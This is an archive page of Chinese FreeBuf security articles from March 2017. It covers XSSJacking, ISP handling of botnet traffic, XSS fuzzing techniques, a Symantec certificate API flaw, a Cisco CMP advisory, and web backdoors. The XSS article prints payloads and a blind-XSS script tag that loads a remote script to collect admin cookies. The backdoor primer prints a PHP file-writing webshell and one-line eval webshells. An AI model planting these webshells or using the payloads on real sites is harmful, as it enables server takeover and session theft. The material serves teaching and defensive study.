今年的6月1日,对我们安全圈来说不仅仅是儿童节,它还有另一个重要的意义:《中华人民共和国网络安全法》将在这一天正式施行。
月份:2017年3月
一种结合了点击劫持、Self-XSS、复制粘贴劫持的新型XSS攻击
XSS劫持(XSSJacking)是由Dylan Ayrey所提出的一种新型XSS攻击,可窃取受害者的敏感信息。XSS劫持需要其他三种技术配合使用,分别是点击劫持,粘贴劫持以及Self-XSS,甚至还需要一些社会工程学的帮助,因此这种攻击只能在那些同时有存储型XSS漏洞或是CSRF漏洞漏洞的网站上执行。
XSS劫持攻击的必要条件
要构成一个XSS劫持攻击有以下几种必要条件:
1.目标网站必须有点击劫持漏洞
2.Self-XSS
3.粘贴劫持
点击劫持,是一种将受害者引向黑客所设计好的圈套的欺骗手段。当受害者点击一个屏幕上的一个按钮时,实际上并没有点到,真正点到的是攻击者事先将不透明度调至0的目标网页。
Self-XSS(自跨站脚本攻击)是一种由受害者自己输入XSS payload触发才能成功的XSS攻击行为,这种攻击可基于DOM,或是建立在仅该用户可操作或可见的域。
知道了Self-XSS,我们大致能猜出攻击思路。但是,怎么才能让用户自己复制粘贴恶意文本呢?复制动作是可以实现自动化的,这个过程需要用户去做的动作就是粘贴了!
这就需要用到粘贴劫持攻击了,这种攻击方式已经存在很多年,主要是在复制粘贴数据后面偷偷加恶意文本实现的。
XSS藏在”复制粘贴“背后
现在有这样一个网站,存在Self-XSS漏洞 https://security.love/XSSJacking。
下图是简化了的XSS代码,如果在这个大框中输入<script>alert(1)</script>就会弹窗。
假设你现在是一个黑客,并且你已经建了一个论坛,在注册页面设置两处常见的要求“Enter your email”栏以及”Retype your email”栏。然后悄悄地在”Retype your email”栏放个隐藏iframe,此位置会加载另一个正常网站的设置页面表单。https://security.love/XSSJacking/index2.html
当用户在你的网站上注册时,大多数人会先输入一遍邮箱,然后复制第一栏中的邮箱再粘贴到第二栏中(小编默默躺枪)——就在这个过程中,用户剪切板中的内容已经神不知鬼不觉地被插入到那个正常网站设置页面中。如果这家正常网站相应表单字段存在XSS漏洞,则攻击代码就能发挥作用。受害者根本就不知道整个过程是怎么进行、何时进行的。
攻击中所利用的粘贴劫持技术,是将XSS payload粘贴到其他域名的文本栏框架。由于这些框架的位置可以改变,并且不可见,因此可以利用点击劫持让用户觉得他还在访问他“正在”访问的那个网站。事实上,他已经触发了Self-XSS漏洞,黑客可得到他的敏感信息。
通过XSS劫持攻击,黑客可以盗取该用户的cookie、收件箱信息、配置详情,修改配置文件设置(比如手机号、邮箱号)或是执行其他恶意操作。
结论
如今的漏洞赏金项目都将点击劫持和Self-XSS排除在外,一旦这两个漏洞同时存在,那么要在目标机器上强制执行XSS payload也不再是难事。
Dylan Ayrey表示谈到很多公司会忽略XSS相关的漏洞报告,他特别提到
攻击者现在有越来越多创新的方法利用Self-XSS,我认为企业在收到这样的报告之后,也会开始重视这样的问题。
*参考来源:bleeping,FB小编bimeover编译,转载请注明来自Freebuf.COM
运营商在打击DDoS攻击上有”不容推卸“的责任
如果你的电脑被黑了,那么这个名叫Dale Drew的人多多少少肯定知道一些内幕。
Level 3 Communications是一家大型互联网骨干网络服务提供商,这家公司会定期监控网络环境中的网络攻击活动,而且该公司目前已经识别出了全球范围内超过1亿5000万个与恶意网络活动有关联的独立IP地址。没错,而Dale Drew就是这家公司的首席安全官(CSO)。
这也就意味着,这些IP地址背后的计算机很可能参与了某些DDoS攻击或电子邮件欺诈活动,而且有些公司所发生的数据泄漏事件也很有可能与它们有关。Drew表示,网络攻击者可以通过各种手段来入侵并劫持这些计算机,然后再利用这些“肉鸡”来威胁互联网的安全,但是这些计算机的实体拥有者可能并不知道自己的电脑正在做这种“肮脏”的事情。
Level 3 Communications公司的其中一项服务就是对恶意网络行为进行追踪,而这种能力也足以表明:当前的互联网服务提供商不仅可以检测到网络中的恶意攻击活动,而且甚至还能对网络犯罪活动所涉及到的IP地址进行精准定位。在某些极端情况下,Level 3 Communications甚至还可以阻止恶意网络流量攻击目标用户,并通过这种技术手段来切断黑客的攻击活动。
那么问题就来了,为什么其他的互联网服务提供商没有采取进一步措施来打击网络犯罪呢?因为对于普通的网络服务提供商而言,他们区分正常流量和恶意流量的能力是极其有限的,如果一定要设计出一种合适的方法来完成这种任务的话,往往就会出现很多极端复杂的情况,而且当你解决了这一个问题之后,又会引发更多的问题出现。
恶意模式
Level 3 Communications目前已经搭建了一个大型数据库,其中保存了1亿7800多万个IP地址(大部分都是静态IP地址),而且技术人员已经将这些地址与可疑的恶意网络活动建立了映射。Drew说到:“我们首先提取出了正常网络流量的“行为模式”,如果某些流量与这个标准有太大偏离的话,那么我们就可以认为它是恶意流量了。这就好比是在运营一家邮局一样,我们不用去检查网络流量的实际内容,就像邮局不会拆开你的信封一样,但是我们仍然可以知道什么人发送了什么信息给什么人。比如说,每当Alice收到一封来自Bob的“信”时,Alice都会抱怨称自己遇到了诈骗,那么我们就可以通过一些启发式算法来分析Bob的这种行为了。”
恶意网络活动的各种模式可以帮助Level3构建出识别算法来识别可疑流量。目前Level 3正在对上百万的IP地址进行实时跟踪,其中有60%的IP地址与僵尸网络有关,而这也就意味着现在有大量受感染的设备随时准备着发动大规模DDoS攻击。除此之外,Level 3还发现其中有22%的IP与电子邮件钓鱼活动有关联。
很多人可能会想, Level 3为什么不直接屏蔽这些IP地址并阻止它们访问互联网呢?因为即便他们这样做了,问题依然会存在。通常情况下,用户的计算机被黑客攻击之后,用户自己可能并不知情,而且我们也无法确定这些设备是否有重要的用途,例如合法金融交易或关键基础设施控制等等。那么在这种情况下,如果直接阻止这些设备访问网络的话,很可能会直接导致数百万美元的经济损失。
因此,Level 3只能尝试将这些恶意IP地址的信息提供给用户。在大多数情况下,信息接收方都是一些企业和公司,因此他们能够迅速对其响应。但是对于普通个人用户来说,他们电脑里也没有“电话本”之类的东西能够与这些IP地址进行绑定和关联,所以Level 3必须与一些网络服务提供商一起合作来保护个人用户的安全。
面对困难要迎难而上
总的来说,这仍然是一场艰苦的战争。Drew表示,当他们屏蔽了一个恶意IP地址之后,又会有十个IP地址出现在他们的名单之中。一个恶意IP倒下了,又有千千万万个恶意IP站了起来。
剑桥大学网络安全中心的研究专家Richard Clayton认为,有些网络服务提供商(包括某些欧洲地区的ISP)会在用户的设备受到感染之后将该事件告知用户,而且越来越多的ISP也开始加入进来,但是让用户来修复自己受感染的计算机其实并不是解决问题的长久之计。就算网络服务提供商直接给用户发送警告信息,可那又能怎样呢?并不是每一位PC用户都知道如何去清除计算机中感染的恶意软件,而且对于ISP来说,这同样是一笔不小的开销。
Clayton在接受采访时说到:
当然了,我们也希望得到ISP的帮助,但是他们正身处于一个竞争异常激烈的市场环境中,他们也在尽可能地努力削减运营成本,而与客户进行沟通以及发送警告信息之类的事情可不便宜。
除此之外,ISP也无法精准地识别出每一次恶意网络攻击。大多数入侵攻击都会伪装成普通的网络流量,所以ISP的检测方法可能会出现识别错误的情况。
没有真正的“银弹”
因此,如果想要打击网络犯罪分子的话,通常需要执法部门和安全研究专家的共同合作。安全研究人员负责对恶意活动和安全威胁进行深入和细致的分析并确定其真实性,而执法部门需要利用其职能来进行更加高权限的打击行动。创建网站和服务已经不仅仅是企业自家的事情了,因为只有企业、政府和ISP的共同合作才能保证用户的安全。
趋势科技的首席网络安全官Ed Cabrera表示,网络服务提供商可以轻而易举地完成各种各样的安全检测,但是类似“屏蔽网络访问”这样的事情肯定是他们不愿意去做的。与此同时,网络犯罪分子也在不断地提升自己的攻击技术来让他们的恶意活动更加难以被检测到。而我们对此的第一反应就是网络服务提供商做得还不够多不够好,但这种说法其实对网络服务提供商来说并不公平。
Drew表示,很多人都想设计出一种完美的解决方案来一次性解决互联网所面临的网络安全问题,但对于目前的情况来说,这种想法未免有些不切实际了。因为网络的安全是多方(网络服务提供商、政府部门、企业以及用户)共同努力的结果。就算我们可以准确地分析出恶意流量,但这也无法修复那些受感染的设备,因此在修复和保护设备这一问题上,终端用户仍然扮演着非常重要的角色。
* 参考来源:NetworkWorld, FB小编Alpha_h4ck编译,转载请注明来自FreeBuf.COM
跨站的艺术:XSS Fuzzing 的技巧
*本文原创作者:[email protected]云鼎实验室,属Freebuf原创奖励计划,未经许可禁止转载
对于XSS的漏洞挖掘过程,其实就是一个使用Payload不断测试和调整再测试的过程,这个过程我们把它叫做Fuzzing;同样是Fuzzing,有些人挖洞比较高效,有些人却不那么容易挖出漏洞,除了掌握的技术之外,比如编码的绕过处理等,还包含一些技巧性的东西,掌握一些技巧和规律,可以使得挖洞会更加从容。
XSS应该是我挖过的最多漏洞的一种Web漏洞类型,累积下来,就国内BAT、金山、新浪、网易等这些互联网公司的XSS,应该至少也有超过100个,这篇文章主要就是根据自己的一些经验与大家一起探讨编码绕过、处理等技术因素之外的XSS Fuzzing的一些技巧。
Fuzzing(模糊测试)是挖掘漏洞最常用的手段之一,不止是XSS,应该可以说Fuzzing可以用于大部分类型的漏洞挖掘。通俗可以把这种方式理解为不断尝试的过程。
XSS的Fuzzing流程
这是一个比较常规的Web漏扫中XSS检测插件的一个流程图,其中比较关键的几个点在于:
- 检测输入点
- 潜在注入点检测
- 生成Payload
- Payload攻击验证
检测输入点其实就是寻找数据入口,比如说GET/POST数据,或者Header头部里的UA/Referer/Cookie,再或者URL路径等等,这些都可以成为输入入口,转换为比较形象点的说法,比如看到一个搜索框,你可能会在搜索框里提交关键词进行搜索,那么这里可能就发生了一个GET或者POST请求,这里其实就是一个输入点。
其次是潜在注入点检测,潜在注入的检测是判断输入点是否可以成功把数据注入到页面内容,对于提交数据内容但是不输出到页面的输入点是没有必要进行Fuzzing的,因为即使可以提交攻击代码,也不会产生XSS;在潜在注入点的检测通常使用的是一个随机字符串,比如随机6位数字,再判断这6位数字是否返回输出在页面,以此来进行判断。为什么不直接使用Payload进行判断呢?因为Payload里包含了攻击代码,通常很多应用都有防火墙或者过滤机制,Payload中的关键词会被拦截导致提交失败或者不会返回输出在页面,但这种情况不代表不能XSS,因为有可能只是Payload不够好,没有绕过过滤或者其他安全机制,所以采用无害的随机数字字符就可以避免这种情况产生,先验证可注入,再调整Payload去绕过过滤;而随机的目的在于不希望固定字符成为XSS防御黑名单里的关键词。
再者就是生成Payload和进行攻击验证的过程,Payload的好坏决定了攻击是否可以成功;而对于不同情况的注入点,需要使用的Payload也是不同的,比如,注入的位置在标签属性中还是标签事件中,使用的Payload是不同的;
标签属性中:如<a href="注入位置">test</a>,Payload:"></a><script>alert(0)</script><a href="
标签事件中:<img href="a.jpg" onload="注入位置">, Payload:alert(0)
其实Payload的生成就是一个不断Fuzzing和不断调整的过程,根据注入位置上下文代码的结构、内容以及应用过滤机制等不断调整和不断提交测试的过程,下图是一个Payload的生成流程。
那么假如某次Payload调整后Fuzzing成功,也就意味XSS注入成功,并得出这个漏洞的PoC。
其实为什么一开始就介绍下扫描器常规的XSS检测方式呢?因为手工Fuzzing XSS其实也是这样一个过程,很多安全工具其实就是将手工的过程自动化。
接下来进入正题我们一起探讨一些XSS的挖掘技巧。
不一样的昵称
这是一个微信网页版的存储型XSS,注入点是微信昵称的位置(右图),通过访问微信群成员列表可以触发XSS导致弹框。
这是微信某个春节摇一摇活动的XSS(这里是生效了<h1>),通过微信访问活动页面,自动授权后获取微信昵称并自动显示在活动页面,当时微信昵称是:<h1>张祖优(Fooying)";alert(0)//,由于<h1>生效,导致昵称显示变大。
这仍然是腾讯某个产品的活动页面,也是通过微信点击自动获取昵称然后在活动页面显示,这个截图的页面链接实际是:http://tdf.qq.com/mobile/index2.html?name=<a href="http://www.fooying.com">点击抽奖</a>&type=share&from=timeline&isappinstalled=1
(相当于当时我的昵称是:<a href="http://www.fooying.com">点击抽奖</a>)
这也是一个微信网页版存储型XSS,注入点同样是在昵称,通过访问通讯录可以触发XSS,触发的昵称大概是:
<img src=0 onerror=alert(5)>。
看了几个漏洞,再给大家看看我之前的QQ昵称和微信昵称:
其中右图的昵称是<h1>张祖优(Fooying)";alert(0)//。
看了上面的例子,我想大家已经可以发现,前面的几个XSS其实都是基本通过昵称的位置提交攻击代码导致了XSS的产生,这其实就是一种XSS被动挖掘的技巧。其实漏洞挖掘,特别是XSS,有时候是靠主动挖掘,但更多的时候也可以通过被动的方式发现,特别是类似QQ、微信这种一号多用的情况,可以想象你的微信昵称、QQ昵称或者签名等,在不同的应用、网页中登录,你的昵称就会在不同的地方显示,这些昵称在微信、QQ本身不会导致问题的产生,但到了其他页面呢?也许就会导致问题的产生。
当然,现在微信应不允许设置含有特殊字符的昵称了,而QQ大家也可以看到,对尖括号进行了转义,不过在这之前,单单就微信昵称,通过这种方式,我起码发现了腾讯以及非腾讯的各种朋友圈中的活动的不下于二十个XSS。
网址跳转中的规律
这是一个13年提交的腾讯云登录跳转的XSS。
前一段时间雷锋网有对我做了一个采访,这篇文章也发在KM上,不知道大家有没有看到其中有一个细节,讲的是我为了哄女朋友开心,然后挖洞收集公仔,当时其实我是在两天内挖洞十几个洞,并且都是XSS。可能大家就会好奇为什么能一下子挖洞那么多的洞,还是不同厂商的,我现在能记得的有YY、4399、搜狐畅游等,其实是当时找到一个规律,上图中腾讯云的这个XSS也属于这个规律,所以就专门提出来。
登录和注册是大部分网站的必备功能,而不知道大家有没有注意到一个细节,当你在未登录状态下访问一些需要需要登录态的页面,比如个人中心,他会自动跳转到登录或者注册页面要求你登录,然后这个时候的登录URL其实会带有一个跳转URL,这是为了方便你登录后直接跳转到你原来访问的页面,是一个比较好的用户体验的设计。
在使用这样的功能的时候,我直接手上尝试,直接把跳转的URL修改为我的博客链接,然后再登录,发现可以直接跳转到我的博客,于是我再尝试了javascript%3Aalert(0),发现JS代码可以直接执行并弹了个框。这个功能的设计其实原来是进行站内的跳转,但是由于功能设计上的缺陷,没有对跳转的URL进行判断或者判断有问题,于是可以导致直接跳转到其他网站或者产生XSS。当然,不止是登录,注册功能也存在同样问题。当时我去测试了很多网站,发现很多网站就存在这样的问题,于是我才可以做到连续去挖不同网站的漏洞来收集公仔,就是用了同样的一个问题。
http://www.xxx.com/login?url=xxx
http://www.xxx.com/reg?url=xxx
而整体的测试流程大概是这样的:
#号里的秘密
这是之前腾讯云官网的一个DOM XSS
这是之前微信国外版官网的一处 DOM XSS
这是之前ent.qq.com域下的一个DOM XSS,这里应该是实现一个页面访问来源统计的功能,将referer拼接到URL通过img加载的方式发起GET请求以此向服务端发送访问来源URL,黑客可以构造地址为http://www.0xsafe.com" onerror="alert(0) 的页面点击链接跳转到 http://datalib.ent.qq.com/tv/3362/detail.shtml,就可以触发XSS。
这是比较早提交的一个游戏igame.qq.com的DOM XSS,这处的XSS正好当时保存下JS,如下,读取window.location然后写入到ID为output的标签代码里,于是导致XSS的产生。
<script language="JavaScript">
document.domain="qq.com";
function pageLoaded(){
window.parent.dhtmlHistory.iframeLoaded(window.location);
document.getElementById("output").innerHTML = window.location;
}
</script>
这类XSS都是DOM XSS,DOM XSS不同于其他类型的XSS,XSS的产生是由于页面中的JS代码在页面渲染完成后通过读取URL等内容修改页面DOM树而产生的XSS。
其实不难可以发现,这类XSS在大部分情况下也是有一些技巧可言的,比如大家可以发现网址中都存在#(DOM XSS不是一定URL得存在#,只是这种情况比较常见);那么是不是见到网址中存在#就可以随便去修改#后面的内容就Fuzzing一通呢?当然不是,还需要去判断页面的源码中的JS代码以及页面引用的JS文件的代码中是否存在对以下内容的使用,是否存在没有过滤或者过滤不全的情况下将以下的内容直接输入到DOM树里。
document.location/location
document.URL
document.URLUnencoded
document.referrer
window.location
被改变的内容
一旦有存在以上的情况,那么往往存在DOM XSS的概率就比较大,接下来就是看看能不能绕过相关的过滤和安全机制的处理。
这是之前挖的一个存在于以前PC 版本QQ的网页预览功能的一个XSS;通过在聊天窗口分享文章,然后点击链接会在右侧打开页面显示文章的内容,会导致XSS的产生。
为什么在客户端里也会存在XSS?其实很多客户端,包括现在很多手机APP,很多功能都是通过内嵌网页进行实现的,于是也就为什么会存在XSS等前端问题。这些网页可以通过设置代理的方式来发现。
这是一篇发表在博客园的文章,文章里包含一些XSS的攻击代码,但是可以发现代码在博客园本身已经被进行了转义,没法产生XSS。
而文章被在QQ中预览的时候,可以发现,被转义的攻击代码又转义了回来(因为这个功能需要只显示文本内容,而删除一些没必要的页面框架、内容的显示,所有对内容有做了一些转码等操作),导致的攻击代码的生效,并由此产生了XSS(其实这类XSS叫做mXSS,突变型XSS)。
这是一篇发表在微信公众号的文章,文章中包含了一些XSS盲打(后面会进行介绍)的攻击代码,然后可以看到,在微信公众号文章里代码被进行了转义,而无法生效产生XSS。
chuansong.me是一个第三方网站,会主动采集微信公众号上的一些文章并生成访问链接和索引,可以看到同样的一篇文章在被传送门采集转载后,本来会被转义的代码直接生效了,于是就成为了存储型XSS,我们通过盲打平台也可以看到其他用户访问这篇文章而被采集并发送到盲打平台的Cookie。
有的时候,被转义的内容也会成为生效的攻击代码,通过控制源头的方式也可以使得XSS的攻击产生。
随手进行的XSS盲打
这是我XSS盲打平台项目的其中一页结果截图,这里的每一项都包含对应网址访问用户的Cookie,而Cookie则可以用来直接登录对应的地址;在图里包含了360 soso、360游戏客服、新浪邮箱等几个网站的后台的Cookie,不过可惜的是,由于这些平台进行了访问限制,所以外网无法访问,也无法登录。
抛开无法访问的问题,那么这些信息是怎么得来了呢?XSS盲打。
常规的XSS攻击是通过页面返回内容中JS攻击代码的生效与否来判断XSS的攻击是否成功;而对于一些网页功能,比如反馈,我们可以发现,不管你提交什么内容,返回的内容都是”感谢您的反馈”类似的语句,并不会根据你提交的内容而在页面中显示不同的内容,对于这样的内容提交点,就无法通过页面反馈判断攻击代码是否注入成功,那么就可以通过XSS盲打。
XSS盲打一般通过XSS盲打平台,在XSS盲打平台建立项目,会生成项目攻击链接,实际上就是一个类似JS文件的访问链接,这个JS文件中其中至少包含一个功能,那就是向盲打平台发送GET/POST请求传输数据回来,比如Cookie,这样的话,类似在反馈页面提交的攻击代码一旦生效,就等于JS代码被执行,那么就会向盲打平台返回数据,那就说明攻击成功了;假如一直没有返回数据,那就说明提交的攻击代码没有执行或者执行出问题,也就证明攻击失败。
盲打平台的项目:
对于我而言,看到类似下图这样一个内容提交的地方,我都会忍不住提交盲打代码
</textarea>'"><script src=http://t.cn/R6qRcps></script>
而类似于这样的功能,如果存在XSS,一般会在什么地方什么时候触发攻击代码呢?管理人员在后台审核这些内容的时候,所以说一般XSS盲打如果成功,往往可以获得对应功能管理后台的地址以及管理员的Cookie,假如管理后台没有做访问的限制,就能用对应管理员的Cookie登录上去。
这就是上图手游客服中心盲打成功得到的后台地址和Cookie(当前已失效并修复)。
总结
在XSS的世界里有很多的Fuzzing技巧和方式,学会从正常功能中发现攻击方式,在Web安全的世界里,除了技术,还需要猥琐的思维和技巧。
另外,其实大家不难发现,不管是昵称、网址跳转或者是文章提到的内容转义的变化也好,很多时候内容原有的地方并不会触发XSS,而内容在其他地方使用后则就触发了XSS,所以对于开发人员来说,不管是来自哪里的内容,都应该有自己的过滤机制,而不能完全的信任,其实总结一句话就是:任何的输入都是有害的!
*本文原创作者:[email protected]云鼎实验室,属Freebuf原创奖励计划,未经许可禁止转载
Android广告软件的新趋势:滥用Android插件框架
合法的移动应用程序通常会嵌入广告SDK或为其他应用程序打广告,毋庸置疑,展示广告或为其他应用程序打广告可为合法的应用程序提供收益。
研究人员称API漏洞暴露了赛门铁克证书,包括证书私钥
事件概述
安全研究专家ChrisByrne在其周五发布的一篇研究报告中称,赛门铁克合作伙伴所使用的应用程序编程接口(API)中存在安全漏洞,而这些安全缺陷将允许攻击者非法获取包括私钥在内的用户凭证。
这名研究专家表示,他早在2015年就已经发现了这个安全问题,而且当时他也将漏洞信息上报给了赛门铁克公司。由于赛门铁克当时声称修复这个漏洞至少需要花费两年的时间,因此他也同意遵守该公司的“保密政策”,即赛门铁克要求Byrne不得向公共披露有关此漏洞的内容。
Byrne在其发表的文章中说到:“如果我认为这是非常有必要的话,我也很愿意遵守他们的漏洞保密政策,但是如果我不披露这个漏洞,那么我觉得自己对客户又有些不负责任了。比如说,如果这个漏洞威胁到了国家安全,如果我发现了一个被入侵的客户,或者很多攻击者开始利用这个漏洞来实施网络犯罪的话,那么又有谁能够站出来保护用户的安全呢?”
API漏洞将泄漏赛门铁克证书,包括私钥在内
根据Byrne的研究报告,赛门铁克证书零售商所使用的赛门铁克API中存在一个严重的安全漏洞,而这个漏洞将允许不法分子在未经授权的情况下访问其他用户的证书数据。Byrne写到:“你只需要在一封钓鱼邮件中嵌入一条恶意链接,当用户点击了这条钓鱼链接之后,你就可以获取到他的证书内容、撤销证书、并重新颁发证书。”
研究人员表示,某些技术能力较强的客户可能很容易就会发现他们可以修改邮件链接中的一个参数,然后访问另一个账号的详细内容或执行某些其他的操作。因为API服务器在用户访问证书信息之前并不会对用户的身份进行验证,而攻击者就可以轻而易举地利用这个漏洞来实现自动化攻击,并窃取赛门铁克用户的数据,然后通过这些数据来识别出攻击价值更高的用户。
除此之外,这个漏洞还将允许攻击者获取目标用户的证书内容,当攻击者获取到用户证书之后,他们就可以利用这些数据来发动中间人攻击(MitM)、拦截用户的在线购物信息、或者利用软件服务器向用户发送伪造的更新请求。当然了,我们在此只能列举一部分攻击,攻击者所能进行的恶意操作还远不止这些。
Byrne表示,除了那些从第三方机构购买赛门铁克证书的用户之外,那些直接从赛门铁克公司购买证书的用户同样会受到这个问题的影响,虽然他们没有使用赛门铁克的API,但是他们在申请证书的过程中会使用到赛门铁克客户端的用户接口。
赛门铁克目前仅修复了部分安全问题
Byrne在文章中提到,由于目前已经有很多通过漏洞接口进行管理的证书受到了这个安全问题的影响,因此赛门铁克公司也承诺会在六个月内找出并更换所有相关的证书。除此之外,赛门铁克公司也承诺会在两年内更换所有用户的证书,并确保不会再有用户会受到该问题的影响。
Byrne在接受媒体记者采访时表示,就在他将这个问题上报给赛门铁克公司之后,他又花了好几个月的时间来测试赛门铁克的基础设施,而赛门铁克公司目前只修复了其中的部分问题,而并没有完全解决所有问题。
Byrne:我将非常谨慎地对待所有与赛门铁克证书有关的网站
在此之后,Byrne也没有再对赛门铁克的基础设施进行测试了。就在Google公司正式对外宣布Chrome浏览器将会逐步取消对赛门铁克证书的信任之后,他决定将他的研究发现公之于众。
Byrne目前还不能确定Google工程师所发现的是否是同一漏洞,但无论怎样,赛门铁克在证书管理方面的安全工作确实做的非常糟糕。
* 参考来源:bleepingcomputer, FB小编Alpha_h4ck编译,转载请注明来自FreeBuf.COM
我们聚集了一批精英白帽子,然后把他们带出了国……
这里是漏洞盒子
我们今天要做一件大事,
这件事我们策划了很久,
现在要大声地宣布出来,
睁大你迷人的双眼看好了:
我们聚集了漏洞盒子上的年度优秀白帽子,将他们带出了国。
这一场策划了数月,备受期待的:
漏洞盒子年度白帽普吉梦想趴
在3月30日凌晨正式出发了!!!!
这是国内首次白帽集体出国游!
这一次,漏洞盒子年度优秀白帽子们将与盒子的小伙伴一起前往泰国普吉岛。
他们来自全国各地,他们在安全圈各有建树,他们因为漏洞盒子聚在了一起,于3月30日凌晨出发,将在普吉展开一场无比美妙的旅程。
来,让盒子妹告诉你他们会在普吉享受到什么样的待遇。
他们将在普吉入住卡伦海滩旁的豪华度假酒店,这个酒店步行3分钟就能抵达海滨,共设三个户外泳池以及六个餐饮场所。
酒店泳池是这样的:
还有这样的:
餐厅是这样的:
环境是这样的:
这样的酒店,让盒子妹全程待在里面也愿意!
既然是梦想趴,当然还有更多好玩的。
整整四天,20名白帽与漏洞盒子一起泰国普吉深度游,潜水人妖泰拳SPA一样都不能放过!
DAY1
为了缓解白帽们路途上的疲倦,我们准备了美好(xiaohun)的泰式SPA。
DAY2
他们将绕着海滨晨跑、漫步,享受最美好的清晨;在海滩打沙滩排球、撕名牌、看美女,共度最欢乐的时光。期间还有超级自助大餐和无限畅饮等待着他们。
DAY3
当然是万众期待的出海与浮潜了!
入夜后还有泰国特色表演——人妖秀。
DAY4
盒子贴心地为白帽们留出了一天的自由活动时间,到普吉镇去感受泰国的文艺气息,到普吉岛最大的寺庙查龙寺拜一拜、到芭东酒吧街shopping……这一天统统满足你。
晚上还有泰拳表演可以观看。
据盒子妹了解,漏洞盒子小伙伴还为白帽们准备了超详细超贴心的旅行小贴士,涉及衣食住行的方方面面,这样暖心的盒子你值得拥有。
看完这些的你有没有很激动?是不是很想去?
盒子妹表示超想去的啊。
接下来的几天,盒子妹将同身在度假胜地却仍将坚守在工作岗位上的前线小伙伴一起,在微博、微信上为大家播报(xiu)此次普吉梦想趴的全过程。
虽然去不了,饱饱眼福也是好的呀。
了解普吉梦想趴最新动态,扫码关注漏洞盒子吧!
当然,既然这是首次出国游,就意味着还有第二次、第三次……
想参加我们下一次的梦想趴让别人羡慕吗?
漏洞盒子新的赛季马上就要开始了,赶紧到漏洞盒子提交漏洞刷积分,称霸排行榜吧!
或者扫描下面的二维码关注漏洞盒子服务号,获取最新项目信息。
也许下一个出国游的白帽子,就是你!
扫码关注漏洞盒子服务号
有关Cisco IOS&IOS XE Software CMP安全漏洞情况的通报
路由交换市场份额领先的思科(Cisco)公司于3月17日发布了IOS和IOS XE Software安全漏洞(CNNVD-201703-840),引起了广泛关注。该漏洞允许未授权的攻击者执行任意代码、提升权限、重启设备等。国家信息安全漏洞库(CNNVD)对此进行了跟踪分析,具体情况如下:
一、 漏洞简介
Cisco IOS/IOS XE Software是美国思科(Cisco)公司为其网络设备开发的操作系统,也是一个与硬件分离的软件体系结构,随网络技术的不断发展,可动态地升级以适应不断变化的技术。集群管理协议(Cluster Management Protocol,CMP) 是集群成员之间内部使用TELNET来进行信号和命令控制的协议。
多款Cisco产品中的IOS和IOS XESoftware存在远程代码执行漏洞(CNNVD-201703-840,CVE-2017-3881)。该漏洞源于未能将CMP-specific Telnet选项限制于内部集群成员之间的本地通信使用,允许任意设备通过远程登录连接的方式接受并处理这些选项,并且错误处理格式不正确的CMP-specific Telnet选项,导致远程攻击者可以利用该漏洞通过发送畸形CMP-specificTelnet选项,向受影响设备建立一个Telnet会话,进而执行任意代码,提升权限,完全控制受影响的设备或导致设备重启。
以下设备受到影响:Cisco Catalyst switches;Embedded Service2020 switches;Enhanced Layer 2 EtherSwitch ServiceModule;Enhanced Layer 2/3 EtherSwitch Service Module;Gigabit Ethernet Switch Module (CGESM) for HP;IE Industrial Ethernet switches;ME 4924-10GEswitch;RF Gateway 10;SM-X Layer2/3 EtherSwitch Service Module。
本次受影响设备达319种型号,具体型号见思科官网。
二、 漏洞危害
截至3月30日,发现全球思科设备约有 1130 万台,其中可能存在上述漏洞的相关设备约有 47.6 万台。其中,中国范围内可能受影响的设备约2.65万台,上海和北京受影响较为严重。
图1 思科设备全球分布
图2 可能受影响的思科设备全球分布
图3 可能受影响的思科设备中国分布
三、 修复措施
3月29日,思科官方已针对该漏洞发布安全公告:
请受影响用户及时检查是否受该漏洞影响。
受影响的CiscoIOS版本为: 15.0(2)SE 10
可将其升级至如下版本以消除漏洞影响:
15.2(5.5.20i)E2
15.2(5.5.15i)E2
15.2(5)EX
15.2(4)E4
本通报由CNNVD技术支撑单位——北京安赛创想科技有限公司、远江盛邦(北京)信息技术有限公司、北京白帽汇科技有限公司提供支持。
CNNVD将继续跟踪上述漏洞的相关情况,及时发布相关信息。如有需要,可与CNNVD联系。
*本文作者:CNNVD(政企账号),转载请注明来自FreeBuf.COM
浅谈.NET程序集安全签名
你知道如何计算这个令牌吗? 或者你知道强名称签名的结构吗? 在这篇文章中,我将详细介绍强名称的工作原理及其缺点。
【新手科普】盘点常见的Web后门
在对一个web站点进行渗透测试的渗透攻击阶段,一般会想办法突破上传限制,向目标可执行目录中写入一个带有攻击性质的脚本来协助获取更大的服务器权限。
这里我们就一起来盘点一下常用的web后门吧
大马与小马
在几年前很流行的网站入侵打油诗中有写
进谷歌 找注入
没注入 就旁注
没旁注 用0day
没0day 猜目录
没目录 就嗅探
爆账户 找后台
传小马 放大马
拿权限 挂页面
放暗链 清数据
清日志 留后门
其中的传小马上大马就是我们要说的小马大马了,小马的功能一般都比较单一,作用一般是向服务器中写入文件数据。因为其功能单一的特性,隐蔽性通常都比较高。有些网站对上传文件大小做了限制,小马因为占用空间也小也能绕过这些限制
这里贴一个php小马
<?php
header("content-Type: text/html; charset=gb2312");
if(get_magic_quotes_gpc()) foreach($_POST as $k=>$v) $_POST[$k] = stripslashes($v);
?>
<form method="POST">
保存文件名: <input type="text" name="file" size="60" value="<? echo str_replace('\\','/',__FILE__) ?>">
<br><br>
<textarea name="text" COLS="70" ROWS="18" ></textarea>
<br><br>
<input type="submit" name="submit" value="保存">
<form>
<?php
if(isset($_POST['file']))
{
$fp = @fopen($_POST['file'],'wb');
echo @fwrite($fp,$_POST['text']) ? '保存成功!' : '保存失败!';
@fclose($fp);
}
?>
大马一般就提供了更多的功能,例如辅助提权,执行sql语句,反弹shell等。
不过网上很多的大马都加了后门,例如图中的这款从mumaasp.com这个网站下载的一款大马会将木马的地址和密码提交到http://www.mumaasp.com/xz/sx.asp这个网址
中国菜刀
中国菜刀和一句话木马想必是大家最熟悉的了,中国菜刀支持asp、php、asp.net和jsp等web编程语言,小巧的中国菜刀还自带了很多实用的功能。例如虚拟终端
还有例如安全扫描,定时闹钟,数据库管理等功能,甚至内置了一个网页浏览器
使用方法也很简单,就是往目标web服务器上传相应的一句话木马
asp一句话木马:
<%execute(request("pass"))%>
php一句话木马:
<?php @eval($_POST[pass]);?>
aspx一句话木马:
<%@ Page Language="Jscript"%>
<%eval(Request.Item["pass"])%>
网上也有很多仿冒中国菜刀的官网发布加了后门的中国菜刀
在linux下也有很多替代中国菜刀的开源产品,例如中国蚁剑和C刀
weevely
